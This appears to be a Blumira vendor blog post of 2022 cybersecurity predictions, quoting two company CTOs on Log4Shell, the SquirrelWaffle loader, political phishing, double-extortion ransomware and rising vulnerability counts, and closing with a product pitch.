Cybersecurity is a fast-moving industry. In 2021 we saw several high-profile ransomware attacks that impacted global supply chains, such as attacks on Colonial Pipeline and JBS.
2021 went out with a bang, as several critical Log4j vulnerabilities were discovered. The impact of those vulnerabilities will likely extend into 2022.
Matthew Warner, CTO and Co-Founder of Blumira, and Aviv Grafi, CTO and Co-Founder of Votiro, offered their cybersecurity predictions in 2022.
Unfortunately the Log4j vulnerabilities (aka Log4Shell) discovered in December presented a prime opportunity for threat actors. Sure enough, Conti had developed a holistic attack chain using Log4j as an access point only a week after the initial vulnerability was discovered.
For opportunistic ransomware groups that operate quickly with purely financial motivations, Log4j is a low-hanging fruit to gain access into an environment.
“We’re going to see ransomware operators leverage [Log4j] to just see what they can get,” said Matt Warner, CTO and Co-Founder of Blumira. “More advanced ransomware operators leverage it in really interesting ways to get deeper into new environments.”
Log4Shell is not only one of the easiest remote code execution (RCE) vulnerabilities that we’ve seen in the past few years, but it’s also the most widespread, said Aviv Grafi, CTO and Co-Founder of Votiro.
Since Log4j is a common logging library used in countless applications, it’s inherently difficult for IT administrators to ensure their organization is properly patched and protected. That’s why detection is the best way to stay protected against Log4j-related attacks.
A malware loader is malicious code that grabs an executable’s object files onto a machine. In late 2021, we saw the emergence of SquirrelWaffle in the wild, a loader that drops malware like Qakbot or the pentesting tool Cobalt Strike.
SquirrelWaffle campaigns typically rely on emails with malicious hyperlinks or attachments that run obfuscated malware-retrieving code when opened.
The advice around preventing ransomware rarely changes: understand the cyber kill chain and ensure that you have the tools to detect behaviors associated with each stage. It’s important to deploy basic security fundamentals, such as endpoint detection and response (EDR) and multi-factor authentication.
“What really changes is the ability of the attackers and the quality of techniques that they’re using, and how they leverage them together,” said Warner.
Security and IT teams must prioritize monitoring behaviors associated with new malware and ransomware campaigns, such as process pivoting within Windows environments. Capturing syslog data and process-finding logs can help with that.
In the United States, 2022 is a midterm election year, which means that we’ll likely see phishing campaigns with political propaganda.
“We’ve seen a lot of growth around propaganda in ransomware attacks, and Covid helped to fuel that,” Warner said. “Propaganda makes phishing easier for attackers because it builds a narrative. It continues to be a flywheel for attacks to build up that logic and say, ‘Here’s how we can attack people with phishing.’”
Phishing campaigns in 2022 will likely be embedded with political language; for example, an email with the subject line ‘5 things you haven’t heard about your favorite candidate’ that encourages victims to click on malicious links or attachments.
“People are emotionally driven, and political propaganda can trigger emotion that would drive a person to click on something,” Grafi said. “That’s an extremely valuable tool for an attacker.”
Twenty years ago, attribution and extortion was less of a concern as a platform for sharing or selling stolen data did not exist like it does today. Now, ransomware is much more focused on blackmailing victims, getting data and doing more with that data.
“What we’ve learned in the last 20 years is that there’s value to that data that attackers will take advantage of,” Warner said.
That’s why small municipalities, local governments and schools are the unfortunate victims of the bystander effect; these entities often have valuable data that ransomware operators are after. These sectors will continue to be attractive targets for cybercrime in 2022.
“Securing environments against these attacks requires broad visibility and risk mitigation efforts that are difficult for organizations of all sizes to keep up with — especially organizations with tighter budgets and smaller IT teams,” Warner said.
In 2022, ransomware operators will continue to employ double extortion — the tactic of encrypting all data and threatening to publish that data to pressure companies to pay the ransom. The natural evolution of holding data for ransom is to continue that into blackmailing for data exposure. This is one of the main reasons that paying the bounty is almost never a good idea and should be avoided at all costs.
“Expecting integrity from criminals is a dangerous game,” Warner added.
2021 was a record-breaking year for the highest number of vulnerabilities to date, according to the US-CERT Vulnerability Database. From multiple Log4j vulnerabilities to HiveNightmare and PrintNightmare, critical vulnerabilities just kept coming throughout the year.
Even worse is that 90% of all CVEs discovered in 2021 can be exploited by attackers with little technical skills, according to Redscan Labs.
Unfortunately, that’s unlikely to slow down in 2022, due to an increased focus on cybersecurity research, as well as the inevitability of more bugs as more software is developed.
But the source of most vulnerabilities will likely be in legacy code, mainly due to the lack of safe coding technologies and processes that developers had access to twenty or thirty years ago.
“Every year we have the conversation, ‘Maybe that will be the last holy grail vulnerability.’ And we always get surprised to see more,” Grafi said. “I think we’ll continue to be surprised.”
No one has a crystal ball, but we can say with near certainty that cyberattacks will continue to have an impact on organizations of all sizes in 2022.
It’s nearly impossible to keep up with the evolving tactics of threat actors. That’s why Blumira performs threat hunting on your behalf, helping you stay protected by monitoring, detecting and responding to behaviors associated with cyberattacks such as ransomware and malware. Our incident detection engineers constantly develop detection rules based on known attacker techniques and automatically deploy them in Blumira’s cloud SIEM platform.
To get started, try Blumira for free or request a demo.